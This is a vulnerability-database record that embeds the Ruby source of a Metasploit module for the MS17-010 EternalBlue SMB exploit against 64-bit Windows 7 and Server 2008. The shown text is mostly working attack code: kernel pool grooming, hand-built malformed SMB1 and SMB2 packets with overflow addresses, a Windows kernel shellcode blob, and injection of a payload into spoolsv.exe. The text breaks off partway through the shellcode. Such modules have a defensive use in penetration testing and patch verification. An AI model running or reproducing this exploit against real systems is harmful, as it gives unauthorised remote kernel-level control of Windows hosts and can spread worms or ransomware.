["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2018-04-12T21:52:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/27786", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'ruby_smb'\r\nrequire 'ruby_smb/smb1/packet'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\r\n 'Description' => %q{\r\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\r\n the FuzzBunch toolkit released by Shadow Brokers.\r\n\r\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\r\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\r\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\r\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\r\n completed in srvnet!SrvNetWskReceiveComplete.\r\n\r\n This exploit, like the original may not trigger 100% of the time, and should be\r\n run continuously until triggered. It seems like the pool will get hot streaks\r\n and need a cool down period before the shells rain in again.\r\n },\r\n\r\n 'Author' => [\r\n 'Sean Dillon <[email\u00a0protected]>', # @zerosum0x0\r\n 'Dylan Davis <[email\u00a0protected]>', # @jennamagius\r\n 'Equation Group',\r\n 'Shadow Brokers'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'MSB', 'MS17-010' ],\r\n [ 'CVE', '2017-0143' ],\r\n [ 'CVE', '2017-0144' ],\r\n [ 'CVE', '2017-0145' ],\r\n [ 'CVE', '2017-0146' ],\r\n [ 'CVE', '2017-0147' ],\r\n [ 'CVE', '2017-0148' ],\r\n [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'Space' => 2000, # this can be more, needs to be recalculated\r\n 'EncoderType' => Msf::Encoder::Type::Raw,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows 7 and Server 2008 (x64) All Service Packs',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ ARCH_X64 ],\r\n\r\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\r\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\r\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\r\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 14 2017'\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(445),\r\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\r\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ),\r\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\r\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] )\r\n ])\r\n end\r\n\r\n def check\r\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\r\n end\r\n\r\n def exploit\r\n begin\r\n for i in 1..datastore['MaxExploitAttempts']\r\n\r\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\r\n\r\n smb_eternalblue(datastore['ProcessName'], grooms)\r\n\r\n # we don't need this sleep, and need to find a way to remove it\r\n # problem is session_count won't increment until stage is complete :\\\r\n secs = 0\r\n while !session_created? and secs < 5\r\n secs += 1\r\n sleep 1\r\n end\r\n\r\n if session_created?\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n break\r\n else\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n end\r\n end\r\n\r\n rescue ::RubySMB::Error::UnexpectedStatusCode,\r\n ::Errno::ECONNRESET,\r\n ::Rex::HostUnreachable,\r\n ::Rex::ConnectionTimeout,\r\n ::Rex::ConnectionRefused => e\r\n print_bad(\"#{e.class}: #{e.message}\")\r\n rescue => error\r\n print_bad(error.class.to_s)\r\n print_bad(error.message)\r\n print_bad(error.backtrace.join(\"\\n\"))\r\n ensure\r\n # pass\r\n end\r\n end\r\n\r\n #\r\n # Increase the default delay by five seconds since some kernel-mode\r\n # payloads may not run immediately.\r\n #\r\n def wfs_delay\r\n super + 5\r\n end\r\n\r\n def smb_eternalblue(process_name, grooms)\r\n begin\r\n # Step 0: pre-calculate what we can\r\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\r\n payload_hdr_pkt = make_smb2_payload_headers_packet\r\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\r\n\r\n # Step 1: Connect to IPC$ share\r\n print_status(\"Connecting to target for exploitation.\")\r\n client, tree, sock = smb1_anonymous_connect_ipc()\r\n print_good(\"Connection established for exploitation.\")\r\n\r\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\r\n\r\n # Step 2: Create a large SMB1 buffer\r\n print_status(\"Sending all but last fragment of exploit packet\")\r\n smb1_large_buffer(client, tree, sock)\r\n\r\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\r\n print_status(\"Starting non-paged pool grooming\")\r\n\r\n # initialize_groom_threads(ip, port, payload, grooms)\r\n fhs_sock = smb1_free_hole(true)\r\n\r\n @groom_socks = []\r\n\r\n print_good(\"Sending SMBv2 buffers\")\r\n smb2_grooms(grooms, payload_hdr_pkt)\r\n\r\n fhf_sock = smb1_free_hole(false)\r\n\r\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\r\n fhs_sock.shutdown()\r\n\r\n print_status(\"Sending final SMBv2 buffers.\") # 6x\r\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\r\n\r\n fhf_sock.shutdown()\r\n\r\n print_status(\"Sending last fragment of exploit packet!\")\r\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\r\n sock.put(final_exploit_pkt)\r\n\r\n print_status(\"Receiving response from exploit packet\")\r\n code, raw = smb1_get_response(sock)\r\n\r\n if code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D)\r\n print_good(\"ETERNALBLUE overwrite completed successfully (0xC000000D)!\")\r\n end\r\n\r\n # Step 4: Send the payload\r\n print_status(\"Sending egg to corrupted connection.\")\r\n\r\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\r\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\r\n\r\n print_status(\"Triggering free of corrupted buffer.\")\r\n # tree disconnect\r\n # logoff and x\r\n # note: these aren't necessary, just close the sockets\r\n\r\n ensure\r\n abort_sockets\r\n end\r\n end\r\n\r\n def smb2_grooms(grooms, payload_hdr_pkt)\r\n grooms.times do |groom_id|\r\n gsock = connect(false)\r\n @groom_socks << gsock\r\n gsock.put(payload_hdr_pkt)\r\n end\r\n end\r\n\r\n def smb1_anonymous_connect_ipc()\r\n sock = connect(false)\r\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\r\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')\r\n client.negotiate\r\n\r\n pkt = make_smb1_anonymous_login_packet\r\n sock.put(pkt)\r\n\r\n code, raw, response = smb1_get_response(sock)\r\n\r\n unless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS\r\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with anonymous login\"\r\n end\r\n\r\n client.user_id = response.uid\r\n\r\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\r\n\r\n return client, tree, sock\r\n end\r\n\r\n def smb1_large_buffer(client, tree, sock)\r\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\r\n\r\n # send NT Trans\r\n vprint_status(\"Sending NT Trans Request packet\")\r\n sock.put(nt_trans_pkt)\r\n\r\n vprint_status(\"Receiving NT Trans packet\")\r\n raw = sock.get_once\r\n\r\n # Initial Trans2 request\r\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\r\n\r\n # send all but last packet\r\n for i in 1..14\r\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\r\n end\r\n\r\n trans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id)\r\n\r\n vprint_status(\"Sending malformed Trans2 packets\")\r\n sock.put(trans2_pkt_nulled)\r\n\r\n sock.get_once\r\n end\r\n\r\n def smb1_free_hole(start)\r\n sock = connect(false)\r\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\r\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')\r\n client.negotiate\r\n\r\n pkt = \"\"\r\n\r\n if start\r\n vprint_status(\"Sending start free hole packet.\")\r\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\r\n else\r\n vprint_status(\"Sending end free hole packet.\")\r\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\r\n end\r\n\r\n #dump_packet(pkt)\r\n sock.put(pkt)\r\n\r\n vprint_status(\"Receiving free hole response.\")\r\n sock.get_once\r\n\r\n return sock\r\n end\r\n\r\n def smb1_get_response(sock)\r\n raw = sock.get_once\r\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\r\n code = response.nt_status\r\n return code, raw, response\r\n end\r\n\r\n def make_smb2_payload_headers_packet\r\n # don't need a library here, the packet is essentially nonsensical\r\n pkt = \"\"\r\n pkt << \"\\x00\" # session message\r\n pkt << \"\\x00\\xff\\xf7\" # size\r\n pkt << \"\\xfeSMB\" # SMB2\r\n pkt << \"\\x00\" * 124\r\n\r\n pkt\r\n end\r\n\r\n def make_smb2_payload_body_packet(kernel_user_payload)\r\n # precalculated lengths\r\n pkt_max_len = 4204\r\n pkt_setup_len = 497\r\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\r\n\r\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\r\n pkt = \"\"\r\n\r\n # padding\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x03\\x00\\x00\\x00\"\r\n pkt << \"\\x00\" * 0x1c\r\n pkt << \"\\x03\\x00\\x00\\x00\"\r\n pkt << \"\\x00\" * 0x74\r\n\r\n # KI_USER_SHARED_DATA addresses\r\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\r\n pkt << \"\\x00\" * 0x10\r\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\r\n pkt << \"\\x00\" * 0xc4\r\n\r\n # payload addreses\r\n pkt << \"\\x90\\xf1\\xdf\\xff\"\r\n pkt << \"\\x00\" * 0x4\r\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\r\n pkt << \"\\x00\" * 0x40\r\n\r\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\"\r\n\r\n pkt << kernel_user_payload\r\n\r\n # fill out the rest, this can be randomly generated\r\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_echo_packet(tree_id, user_id)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # type\r\n pkt << \"\\x00\\x00\\x31\" # len = 49\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x2b\" # Echo\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Success\r\n pkt << \"\\x18\" # flags\r\n pkt << \"\\x07\\xc0\" # flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << [tree_id].pack(\"S>\") # Tree ID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexIDs\r\n\r\n pkt << \"\\x01\" # Word count\r\n pkt << \"\\x01\\x00\" # Echo count\r\n pkt << \"\\x0c\\x00\" # Byte count\r\n\r\n # echo data\r\n # this is an existing IDS signature, and can be nulled out\r\n #pkt << \"\\x4a\\x6c\\x4a\\x6d\\x49\\x68\\x43\\x6c\\x42\\x73\\x72\\x00\"\r\n pkt << \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\"\r\n\r\n pkt\r\n end\r\n\r\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\r\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\r\n timeout = (timeout * 0x10) + 3\r\n\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x10\\x35\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x33\" # Trans2 request\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << [tree_id].pack(\"S>\") # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexIDs\r\n\r\n pkt << \"\\x09\" # Word Count\r\n pkt << \"\\x00\\x00\" # Total Param Count\r\n pkt << \"\\x00\\x10\" # Total Data Count\r\n pkt << \"\\x00\\x00\" # Max Param Count\r\n pkt << \"\\x00\\x00\" # Max Data Count\r\n pkt << \"\\x00\" # Max Setup Count\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x00\\x10\" # Flags\r\n pkt << \"\\x35\\x00\\xd0\" # Timeouts\r\n pkt << timeout.chr\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x10\" # Parameter Count\r\n\r\n #pkt << \"\\x74\\x70\" # Parameter Offset\r\n #pkt << \"\\x47\\x46\" # Data Count\r\n #pkt << \"\\x45\\x6f\" # Data Offset\r\n #pkt << \"\\x4c\" # Setup Count\r\n #pkt << \"\\x4f\" # Reserved\r\n\r\n if type == :eb_trans2_exploit\r\n vprint_status(\"Making :eb_trans2_exploit packet\")\r\n\r\n pkt << \"\\x41\" * 2957\r\n\r\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\r\n\r\n pkt << \"\\x00\" * 0x10\r\n pkt << \"\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x6\r\n pkt << \"\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x16\r\n\r\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x20\\xf0\\xdf\\xff\"\r\n\r\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\r\n\r\n pkt << \"\\x60\\x00\\x04\\x10\"\r\n pkt << \"\\x00\" * 4\r\n\r\n pkt << \"\\x80\\xef\\xdf\\xff\"\r\n\r\n pkt << \"\\x00\" * 4\r\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x10\r\n\r\n pkt << \"\\x60\\x00\\x04\\x10\"\r\n pkt << \"\\x00\" * 0xc\r\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x80\\x10\"\r\n pkt << \"\\x00\" * 0xe\r\n pkt << \"\\x39\"\r\n pkt << \"\\xbb\"\r\n\r\n pkt << \"\\x41\" * 965\r\n\r\n return pkt\r\n end\r\n\r\n if type == :eb_trans2_zero\r\n vprint_status(\"Making :eb_trans2_zero packet\")\r\n pkt << \"\\x00\" * 2055\r\n pkt << \"\\x83\\xf3\"\r\n pkt << \"\\x41\" * 2039\r\n #pkt << \"\\x00\" * 4096\r\n else\r\n vprint_status(\"Making :eb_trans2_buffer packet\")\r\n pkt << \"\\x41\" * 4096\r\n end\r\n\r\n pkt\r\n\r\n end\r\n\r\n def make_smb1_nt_trans_packet(tree_id, user_id)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x04\\x38\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\xa0\" # NT Trans\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << [tree_id].pack(\"S>\") # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n\r\n pkt << \"\\x14\" # Word Count\r\n pkt << \"\\x01\" # Max Setup Count\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Total Param Count\r\n pkt << \"\\xd0\\x03\\x01\\x00\" # Total Data Count\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Max Param Count\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Max Data Count\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Param Count\r\n pkt << \"\\x4b\\x00\\x00\\x00\" # Param Offset\r\n pkt << \"\\xd0\\x03\\x00\\x00\" # Data Count\r\n pkt << \"\\x68\\x00\\x00\\x00\" # Data Offset\r\n pkt << \"\\x01\" # Setup Count\r\n pkt << \"\\x00\\x00\" # Function <unknown>\r\n pkt << \"\\x00\\x00\" # Unknown NT transaction (0) setup\r\n pkt << \"\\xec\\x03\" # Byte Count\r\n pkt << \"\\x00\" * 0x1f # NT Parameters\r\n\r\n # undocumented\r\n pkt << \"\\x01\"\r\n pkt << \"\\x00\" * 0x3cd\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x00\\x51\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x73\" # Session Setup AndX\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << flags2 # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << \"\\x00\\x00\" # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n #pkt << \"\\x00\\x00\" # Reserved\r\n\r\n pkt << \"\\x0c\" # Word Count\r\n pkt << \"\\xff\" # No further commands\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # AndXOffset\r\n pkt << \"\\x04\\x11\" # Max Buffer\r\n pkt << \"\\x0a\\x00\" # Max Mpx Count\r\n pkt << vcnum # VC Number\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Session key\r\n pkt << \"\\x00\\x00\" # Security blob length\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\\x00\\x80\" # Capabilities\r\n pkt << \"\\x16\\x00\" # Byte count\r\n #pkt << \"\\xf0\" # Security Blob: <MISSING>\r\n #pkt << \"\\xff\\x00\\x00\\x00\" # Native OS\r\n #pkt << \"\\x00\\x00\" # Native LAN manager\r\n #pkt << \"\\x00\\x00\" # Primary domain\r\n pkt << native_os\r\n pkt << \"\\x00\" * 17 # Extra byte params\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_anonymous_login_packet\r\n # Neither Rex nor RubySMB appear to support Anon login?\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x00\\x88\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x73\" # Session Setup AndX\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n\r\n pkt << \"\\x0d\" # Word Count\r\n pkt << \"\\xff\" # No further commands\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x88\\x00\" # AndXOffset\r\n pkt << \"\\x04\\x11\" # Max Buffer\r\n pkt << \"\\x0a\\x00\" # Max Mpx Count\r\n pkt << \"\\x00\\x00\" # VC Number\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Session key\r\n pkt << \"\\x01\\x00\" # ANSI pw length\r\n pkt << \"\\x00\\x00\" # Unicode pw length\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Reserved\r\n pkt << \"\\xd4\\x00\\x00\\x00\" # Capabilities\r\n pkt << \"\\x4b\\x00\" # Byte count\r\n pkt << \"\\x00\" # ANSI pw\r\n pkt << \"\\x00\\x00\" # Account name\r\n pkt << \"\\x00\\x00\" # Domain name\r\n\r\n # Windows 2000 2195\r\n pkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\r\n pkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\"\r\n pkt << \"\\x00\\x00\"\r\n\r\n # Windows 2000 5.0\r\n pkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\r\n pkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x30\\x00\\x00\\x00\"\r\n\r\n pkt\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\r\n # et_alertable = ETHREAD.Alertable offset\r\n # teb_acp = TEB.ActivationContextPointer offset\r\n # et_tle = ETHREAD.ThreadListEntry offset\r\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\r\n sc = make_kernel_shellcode\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n sc\r\n end\r\n\r\n def make_kernel_shellcode\r\n # https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm\r\n # Name: kernel\r\n # Length: 1019 bytes\r\n\r\n #\"\\xcc\"+\r\n \"\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\" +\r\n \"\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\\x00\\x00\\x00\\x48\\x89\\xC2\" +\r\n \"\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\\x65\\x48\\x89\\x24\\x25\\x10\" +\r\n \"\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x50\\x53\\x51\\x52\" +\r\n \"\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\" +\r\n \"\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\\x00\\x00\\x00\\x41\\x53\\x6A\" +\r\n \"\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\\x48\\x81\\xEC\\x58\\x01\\x00\" +\r\n \"\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\\x89\\x9D\\xC0\\x00\\x00\\x00\" +\r\n \"\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\\xD0\\x00\\x00\\x00\\x48\\xA1\" +\r\n \"\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x48\" +\r\n \"\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x30\\xFB\\xE8\" +\r\n \"\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x48\\x83\" +\r\n \"\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\\x41\\x5B\\x41\\x5A\\x41\\x59\" +\r\n \"\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\\x48\\x8B\\x24\\x25\\x10\\x00\" +\r\n \"\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\\xD0\\xFF\\x56\\x41\\x57\\x41\" +\r\n 